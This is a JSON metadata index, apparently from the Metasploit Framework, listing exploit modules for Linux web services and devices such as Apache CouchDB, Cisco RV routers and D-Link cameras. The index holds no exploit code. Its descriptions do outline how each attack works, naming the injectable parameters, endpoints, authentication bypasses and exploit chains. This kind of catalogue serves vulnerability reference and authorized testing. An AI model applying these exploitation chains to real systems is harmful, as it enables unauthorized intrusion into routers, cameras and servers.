"exploit_linux/http/apache_continuum_cmd_exec": {
"name": "Apache Continuum Arbitrary Command Execution",
"full_name": "exploit/linux/http/apache_continuum_cmd_exec",
"rank": 600,
"disclosure_date": "2016-04-06",
"type": "exploit",
"author": [
"David Shanahan",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a command injection in Apache Continuum <= 1.4.2.\n By injecting a command into the installation.varValue POST parameter to\n /continuum/saveInstallation.action, a shell can be spawned.",
"references": [
"EDB-39886"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Apache Continuum <= 1.4.2"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/linux/http/apache_continuum_cmd_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/apache_continuum_cmd_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/apache_couchdb_cmd_exec": {
"name": "Apache CouchDB Arbitrary Command Execution",
"full_name": "exploit/linux/http/apache_couchdb_cmd_exec",
"rank": 600,
"disclosure_date": "2016-04-06",
"type": "exploit",
"author": [
"Max Justicz",
"Joan Touzet",
"Green-m <greenm.xxoo@gmail.com>"
],
"description": "CouchDB administrative users can configure the database server via HTTP(S).\n Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB.\n This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user,\n including downloading and executing scripts from the public internet.",
"references": [
"CVE-2017-12636",
"CVE-2017-12635",
"URL-https://justi.cz/security/2017/11/14/couchdb-rce-npm.html",
"URL-http://docs.couchdb.org/en/latest/cve/2017-12636.html",
"URL-https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": 5984,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Apache CouchDB version 1.x",
"Apache CouchDB version 2.x"
],
"mod_time": "2018-08-09 23:34:03 +0000",
"path": "/modules/exploits/linux/http/apache_couchdb_cmd_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/apache_couchdb_cmd_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/astium_sqli_upload": {
"name": "Astium Remote Code Execution",
"full_name": "exploit/linux/http/astium_sqli_upload",
"rank": 0,
"disclosure_date": "2013-09-17",
"type": "exploit",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits vulnerabilities found in Astium astium-confweb-2.1-25399 RPM and\n lower. A SQL Injection vulnerability is used to achieve authentication bypass and gain\n admin access. From an admin session arbitrary PHP code upload is possible. It is used\n to add the final PHP payload to \"/usr/local/astium/web/php/config.php\" and execute the\n \"sudo /sbin/service astcfgd reload\" command to reload the configuration and achieve\n remote root code execution.",
"references": [
"OSVDB-88860",
"EDB-23831"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Astium 2.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/astium_sqli_upload.rb",
"is_install_path": true,
"ref_name": "linux/http/astium_sqli_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/asuswrt_lan_rce": {
"name": "AsusWRT LAN Unauthenticated Remote Code Execution",
"full_name": "exploit/linux/http/asuswrt_lan_rce",
"rank": 600,
"disclosure_date": "2018-01-22",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to\n perform a POST in certain cases. This can be combined with another vulnerability in\n the VPN configuration upload routine that sets NVRAM configuration variables directly\n from the POST request to enable a special command mode.\n This command mode can then be abused by sending a UDP packet to infosvr, which is running\n on port UDP 9999 to directly execute commands as root.\n This exploit leverages that to start telnetd in a random port, and then connects to it.\n It has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743.",
"references": [
"URL-https://blogs.securiteam.com/index.php/archives/3589",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt",
"URL-https://seclists.org/fulldisclosure/2018/Jan/78",
"CVE-2018-5999",
"CVE-2018-6000"
],
"platform": "Unix",
"arch": "cmd",
"rport": 9999,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"AsusWRT < v3.0.0.4.384.10007"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/http/asuswrt_lan_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/asuswrt_lan_rce",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/atutor_filemanager_traversal": {
"name": "ATutor 2.2.1 Directory Traversal / Remote Code Execution",
"full_name": "exploit/linux/http/atutor_filemanager_traversal",
"rank": 600,
"disclosure_date": "2016-03-01",
"type": "exploit",
"author": [
"mr_me <steventhomasseeley@gmail.com>"
],
"description": "This module exploits a directory traversal vulnerability in ATutor on an Apache/PHP\n setup with display_errors set to On, which can be used to allow us to upload a malicious\n ZIP file. On the web application, a blacklist verification is performed before extraction,\n however it is not sufficient to prevent exploitation.\n\n You are required to login to the target to reach the vulnerability, however this can be\n done as a student account and remote registration is enabled by default.\n\n Just in case remote registration isn't enabled, this module uses 2 vulnerabilities\n in order to bypass the authentication:\n\n 1. confirm.php Authentication Bypass Type Juggling vulnerability\n 2. password_reminder.php Remote Password Reset TOCTOU vulnerability",
"references": [
"URL-http://www.atutor.ca/",
"URL-http://sourceincite.com/research/src-2016-09/",
"URL-http://sourceincite.com/research/src-2016-10/",
"URL-http://sourceincite.com/research/src-2016-11/",
"URL-https://github.com/atutor/ATutor/pull/107"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-08-09 23:34:03 +0000",
"path": "/modules/exploits/linux/http/atutor_filemanager_traversal.rb",
"is_install_path": true,
"ref_name": "linux/http/atutor_filemanager_traversal",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/axis_srv_parhand_rce": {
"name": "Axis Network Camera .srv to parhand RCE",
"full_name": "exploit/linux/http/axis_srv_parhand_rce",
"rank": 600,
"disclosure_date": "2018-06-18",
"type": "exploit",
"author": [
"Or Peles",
"wvu <wvu@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>",
"Brent Cook",
"Jacob Robles",
"Matthew Kienow",
"Shelby Pace",
"Chris Lee",
"Cale Black"
],
"description": "This module exploits an auth bypass in .srv functionality and a\n command injection in parhand to execute code as the root user.",
"references": [
"CVE-2018-10660",
"CVE-2018-10661",
"CVE-2018-10662",
"URL-https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/",
"URL-https://www.axis.com/files/faq/Advisory_ACV-128401.pdf"
],
"platform": "Linux,Unix",
"arch": "cmd, armle",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix In-Memory",
"Linux Dropper"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/linux/http/axis_srv_parhand_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/axis_srv_parhand_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/belkin_login_bof": {
"name": "Belkin Play N750 login.cgi Buffer Overflow",
"full_name": "exploit/linux/http/belkin_login_bof",
"rank": 300,
"disclosure_date": "2014-05-09",
"type": "exploit",
"author": [
"Marco Vaz <mv@integrity.pt>",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits a remote buffer overflow vulnerability on Belkin Play N750 DB\n Wireless Dual-Band N+ Router N750 routers. The vulnerability exists in the handling\n of HTTP queries with long 'jump' parameters addressed to the /login.cgi URL, allowing\n remote unauthenticated attackers to execute arbitrary code. This module was tested in\n an emulated environment, using the version 1.10.16.m of the firmware.",
"references": [
"CVE-2014-1635",
"EDB-35184",
"BID-70977",
"OSVDB-114345",
"URL-https://labs.integrity.pt/articles/from-0-day-to-exploit-buffer-overflow-in-belkin-n750-cve-2014-1635/",
"URL-http://www.belkin.com/us/support-article?articleNum=4831"
],
"platform": "Linux",
"arch": "mipsle",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Belkin Play N750 DB Wireless Dual-Band N+ Router, F9K1103, firmware 1.10.16.m"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/belkin_login_bof.rb",
"is_install_path": true,
"ref_name": "linux/http/belkin_login_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/centreon_sqli_exec": {
"name": "Centreon SQL and Command Injection",
"full_name": "exploit/linux/http/centreon_sqli_exec",
"rank": 600,
"disclosure_date": "2014-10-15",
"type": "exploit",
"author": [
"MaZ",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits several vulnerabilities on Centreon 2.5.1 and prior and Centreon\n Enterprise Server 2.2 and prior. Due to a combination of SQL injection and command\n injection in the displayServiceStatus.php component, it is possible to execute arbitrary\n commands as long as there is a valid session registered in the centreon.session table.\n In order to have a valid session, all it takes is a successful login from anybody.\n The exploit itself does not require any authentication.\n\n This module has been tested successfully on Centreon Enterprise Server 2.2.",
"references": [
"CVE-2014-3828",
"CVE-2014-3829",
"US-CERT-VU-298796",
"URL-https://seclists.org/fulldisclosure/2014/Oct/78"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Centreon Enterprise Server 2.2"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/http/centreon_sqli_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/centreon_sqli_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/centreon_useralias_exec": {
"name": "Centreon Web Useralias Command Execution",
"full_name": "exploit/linux/http/centreon_useralias_exec",
"rank": 600,
"disclosure_date": "2016-02-26",
"type": "exploit",
"author": [
"h00die <mike@shorebreaksecurity.com>",
"Nicolas CHATELAIN <n.chatelain@sysdream.com>"
],
"description": "Centreon Web Interface <= 2.5.3 utilizes an ECHO for logging SQL\n errors. This functionality can be abused for arbitrary code\n execution, and can be triggered via the login screen prior to\n authentication.",
"references": [
"EDB-39501"
],
"platform": "Python",
"arch": "python",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/centreon_useralias_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/centreon_useralias_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/cfme_manageiq_evm_upload_exec": {
"name": "Red Hat CloudForms Management Engine 5.1 agent/linuxpkgs Path Traversal",
"full_name": "exploit/linux/http/cfme_manageiq_evm_upload_exec",
"rank": 600,
"disclosure_date": "2013-09-04",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "This module exploits a path traversal vulnerability in the \"linuxpkgs\"\n action of \"agent\" controller of the Red Hat CloudForms Management Engine 5.1\n (ManageIQ Enterprise Virtualization Manager 5.0 and earlier).\n It uploads a fake controller to the controllers directory of the Rails\n application with the encoded payload as an action and sends a request to\n this action to execute the payload. Optionally, it can also upload a routing\n file containing a route to the action. (Which is not necessary, since the\n application already contains a general default route.)",
"references": [
"CVE-2013-2068",
"CWE-22",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=960422"
],
"platform": "Ruby",
"arch": "ruby",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/cfme_manageiq_evm_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/cisco_firepower_useradd": {
"name": "Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability",
"full_name": "exploit/linux/http/cisco_firepower_useradd",
"rank": 600,
"disclosure_date": "2016-10-10",
"type": "exploit",
"author": [
"Matt",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Cisco Firepower Management Console.\n The management system contains a configuration flaw that allows the www user to\n execute the useradd binary, which can be abused to create backdoor accounts.\n Authentication is required to exploit this vulnerability.",
"references": [
"CVE-2016-6433",
"URL-https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking"
],
"platform": "Linux",
"arch": "x86",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Cisco Firepower Management Console 6.0.1 (build 1213)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/cisco_firepower_useradd.rb",
"is_install_path": true,
"ref_name": "linux/http/cisco_firepower_useradd",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/cisco_prime_inf_rce": {
"name": "Cisco Prime Infrastructure Unauthenticated Remote Code Execution",
"full_name": "exploit/linux/http/cisco_prime_inf_rce",
"rank": 600,
"disclosure_date": "2018-10-04",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "Cisco Prime Infrastructure (CPI) contains two basic flaws that when exploited allow\n an unauthenticated attacker to achieve remote code execution. The first flaw is a file\n upload vulnerability that allows the attacker to upload and execute files as the Apache\n Tomcat user; the second is a privilege escalation to root by bypassing execution restrictions\n in a SUID binary.\n\n This module exploits these vulnerabilities to achieve unauthenticated remote code execution\n as root on the CPI default installation.\n\n This module has been tested with CPI 3.2.0.0.258 and 3.4.0.0.348. Earlier and later versions\n might also be affected, although 3.4.0.0.348 is the latest at the time of writing.\n The file upload vulnerability should have been fixed in versions 3.4.1 and 3.3.1 Update 02.",
"references": [
"CVE-2018-15379",
"URL-https://seclists.org/fulldisclosure/2018/Oct/19",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-prime-infrastructure.txt",
"URL-https://blogs.securiteam.com/index.php/archives/3723",
"URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Cisco Prime Infrastructure < 3.4.1 & 3.3.1 Update 02"
],
"mod_time": "2018-11-05 00:52:34 +0000",
"path": "/modules/exploits/linux/http/cisco_prime_inf_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/cisco_prime_inf_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/cisco_rv130_rmi_rce": {
"name": "Cisco RV130W Routers Management Interface Remote Command Execution",
"full_name": "exploit/linux/http/cisco_rv130_rmi_rce",
"rank": 400,
"disclosure_date": "2019-02-27",
"type": "exploit",
"author": [
"Yu Zhang",
"Haoliang Lu",
"T. Shiomitsu",
"Quentin Kaiser <kaiserquentin@gmail.com>"
],
"description": "A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router\n could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.\n\n The vulnerability is due to improper validation of user-supplied data in the web-based management interface.\n An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.\n\n A successful exploit could allow the attacker to execute arbitrary code on the underlying operating\n system of the affected device as a high-privilege user.\n\n RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.\n\n Note: successful exploitation may not result in a session, and as such,\n on_new_session will never repair the HTTP server, leading to a denial-of-service condition.",
"references": [
"CVE-2019-1663",
"BID-107185",
"URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex"
],
"platform": "Linux",
"arch": "armle",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Cisco RV130/RV130W < 1.0.3.45"
],
"mod_time": "2019-04-12 14:23:57 +0000",
"path": "/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/cisco_rv130_rmi_rce",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-service-down"
]
}
},
"exploit_linux/http/cisco_rv32x_rce": {
"name": "Cisco RV320 and RV325 Unauthenticated Remote Code Execution",
"full_name": "exploit/linux/http/cisco_rv32x_rce",
"rank": 300,
"disclosure_date": "2018-09-09",
"type": "exploit",
"author": [
"RedTeam Pentesting GmbH",
"Philip Huppert",
"Benjamin Grap"
],
"description": "This exploit module combines an information disclosure (CVE-2019-1653)\n and a command injection vulnerability (CVE-2019-1652) together to gain\n unauthenticated remote code execution on Cisco RV320 and RV325 small business\n routers. Can be exploited via the WAN interface of the router. Either via HTTPS\n on port 443 or HTTP on port 8007 on some older firmware versions.",
"references": [
"CVE-2019-1653",
"CVE-2019-1652",
"EDB-46243",
"BID-106728",
"BID-106732",
"URL-https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-002/-cisco-rv320-unauthenticated-configuration-export",
"URL-https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-004/-cisco-rv320-command-injection"
],
"platform": "Linux",
"arch": "",
"rport": 8007,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"LINUX MIPS64"
],
"mod_time": "2019-03-20 14:21:40 +0000",
"path": "/modules/exploits/linux/http/cisco_rv32x_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/cisco_rv32x_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/crypttech_cryptolog_login_exec": {
"name": "Crypttech CryptoLog Remote Code Execution",
"full_name": "exploit/linux/http/crypttech_cryptolog_login_exec",
"rank": 600,
"disclosure_date": "2017-05-03",
"type": "exploit",
"author": [
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits a SQL injection and command injection vulnerability in the PHP version of CryptoLog.\n An unauthenticated user can execute a terminal command under the context of the web user. These vulnerabilities\n are no longer present in the ASP.NET version CryptoLog, available since 2009.\n\n CryptoLog's login.php endpoint is responsible for the login process. One of the user supplied parameters is\n used by the application without input validation and parameter binding, which leads to SQL injection\n vulnerability. Successfully exploiting this vulnerability gives a valid session.\n\n CryptoLog's logshares_ajax.php endpoint is responsible for executing an operation system command. It's not\n possible to access this endpoint without having a valid session. One user parameter is used by the\n application while executing an operating system command, which causes a command injection issue.\n\n Combining these vulnerabilities gives the opportunity execute operation system commands under the context\n of the web user.",
"references": [
"URL-https://pentest.blog/advisory-cryptolog-unauthenticated-remote-code-execution/"
],
"platform": "Python",
"arch": "python",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/http/crypttech_cryptolog_login_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/crypttech_cryptolog_login_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dcos_marathon": {
"name": "DC/OS Marathon UI Docker Exploit",
"full_name": "exploit/linux/http/dcos_marathon",
"rank": 600,
"disclosure_date": "2017-03-03",
"type": "exploit",
"author": [
"Erik Daguerre"
],
"description": "Utilizing the DCOS Cluster's Marathon UI, an attacker can create\n a docker container with the '/' path mounted with read/write\n permissions on the host server that is running the docker container.\n As the docker container executes command as uid 0 it is honored\n by the host operating system allowing the attacker to edit/create\n files owed by root. This exploit abuses this to creates a cron job\n in the '/etc/cron.d/' path of the host server.\n\n *Notes: The docker image must be a valid docker image from\n hub.docker.com. Furthermore the docker container will only\n deploy if there are resources available in the DC/OS cluster.",
"references": [
"URL-https://warroom.securestate.com/dcos-marathon-compromise/"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Python"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/http/dcos_marathon.rb",
"is_install_path": true,
"ref_name": "linux/http/dcos_marathon",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/ddwrt_cgibin_exec": {
"name": "DD-WRT HTTP Daemon Arbitrary Command Execution",
"full_name": "exploit/linux/http/ddwrt_cgibin_exec",
"rank": 600,
"disclosure_date": "2009-07-20",
"type": "exploit",
"author": [
"gat3way",
"hdm <x@hdm.io>"
],
"description": "This module abuses a metacharacter injection vulnerability in the\n HTTP management server of wireless gateways running DD-WRT. This flaw\n allows an unauthenticated attacker to execute arbitrary commands as\n the root user account.",
"references": [
"CVE-2009-2765",
"OSVDB-55990",
"BID-35742",
"EDB-9209"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/ddwrt_cgibin_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/ddwrt_cgibin_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/denyall_waf_exec": {
"name": "DenyAll Web Application Firewall Remote Code Execution",
"full_name": "exploit/linux/http/denyall_waf_exec",
"rank": 600,
"disclosure_date": "2017-09-19",
"type": "exploit",
"author": [
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a\n terminal command under the context of the web server user.",
"references": [
"CVE-2017-14706",
"URL-https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/",
"URL-https://www.denyall.com/blog/advisories/advisory-unauthenticated-remote-code-execution-denyall-web-application-firewall/"
],
"platform": "Python",
"arch": "python",
"rport": 3001,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-10-04 12:11:58 +0000",
"path": "/modules/exploits/linux/http/denyall_waf_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/denyall_waf_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dlink_authentication_cgi_bof": {
"name": "D-Link authentication.cgi Buffer Overflow",
"full_name": "exploit/linux/http/dlink_authentication_cgi_bof",
"rank": 300,
"disclosure_date": "2013-02-08",
"type": "exploit",
"author": [
"Roberto Paleari",
"Craig Heffner",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits a remote buffer overflow vulnerability on several D-Link routers.\n The vulnerability exists in the handling of HTTP queries to the authentication.cgi with\n long password values. The vulnerability can be exploitable without authentication. This\n module has been tested successfully on D-Link firmware DIR645A1_FW103B11. Other firmwares\n such as the DIR865LA1_FW101b06 and DIR845LA1_FW100b20 are also vulnerable.",
"references": [
"OSVDB-95951",
"EDB-27283",
"URL-http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008",
"URL-http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000",
"URL-http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt"
],
"platform": "Linux",
"arch": "mipsle",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"D-Link DIR-645 1.03"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_authentication_cgi_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dlink_command_php_exec_noauth": {
"name": "D-Link Devices Unauthenticated Remote Command Execution",
"full_name": "exploit/linux/http/dlink_command_php_exec_noauth",
"rank": 600,
"disclosure_date": "2013-02-04",
"type": "exploit",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Various D-Link Routers are vulnerable to OS command injection via the web\n interface. The vulnerability exists in command.php, which is accessible without\n authentication. This module has been tested with the versions DIR-600 2.14b01,\n DIR-300 rev B 2.13.",
"references": [
"OSVDB-89861",
"EDB-24453",
"BID-57734",
"URL-http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router",
"URL-http://www.s3cur1ty.de/home-network-horror-days",
"URL-http://www.s3cur1ty.de/m1adv2013-003"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_command_php_exec_noauth",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dlink_dcs931l_upload": {
"name": "D-Link DCS-931L File Upload",
"full_name": "exploit/linux/http/dlink_dcs931l_upload",
"rank": 500,
"disclosure_date": "2015-02-23",
"type": "exploit",
"author": [
"Mike Baucom",
"Allen Harper",
"J. Rach",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a file upload vulnerability in D-Link DCS-931L\n network cameras. The setFileUpload functionality allows authenticated\n users to upload files to anywhere on the file system, allowing system\n files to be overwritten, resulting in execution of arbitrary commands.\n This module has been tested successfully on a D-Link DCS-931L with\n firmware versions 1.01_B7 (2013-04-19) and 1.04_B1 (2014-04-21).\n D-Link DCS-930L, DCS-932L, DCS-933L models are also reportedly\n affected, but untested.",
"references": [
"CVE-2015-2049",
"URL-https://tangiblesecurity.com/index.php/announcements/tangible-security-researchers-notified-and-assisted-d-link-with-fixing-critical-device-vulnerabilities",
"URL-http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10049"
],
"platform": "Linux",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux mipsle Payload"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/http/dlink_dcs931l_upload.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_dcs931l_upload",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/dlink_dcs_930l_authenticated_remote_command_execution": {
"name": "D-Link DCS-930L Authenticated Remote Command Execution",
"full_name": "exploit/linux/http/dlink_dcs_930l_authenticated_remote_command_execution",
"rank": 600,
"disclosure_date": "2015-12-20",
"type": "exploit",
"author": [
"Nicholas Starke <nick@alephvoid.com>"
],
"description": "The D-Link DCS-930L Network Video Camera is vulnerable\n to OS Command Injection via the web interface. The vulnerability\n exists at /setSystemCommand, which is accessible with credentials.\n This vulnerability was present in firmware version 2.01 and fixed\n by 2.12.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
23,
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"telnet",
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_dcs_930l_authenticated_remote_command_execution",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/dlink_diagnostic_exec_noauth": {
"name": "D-Link DIR-645 / DIR-815 diagnostic.php Command Execution",
"full_name": "exploit/linux/http/dlink_diagnostic_exec_noauth",
"rank": 600,
"disclosure_date": "2013-03-05",
"type": "exploit",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
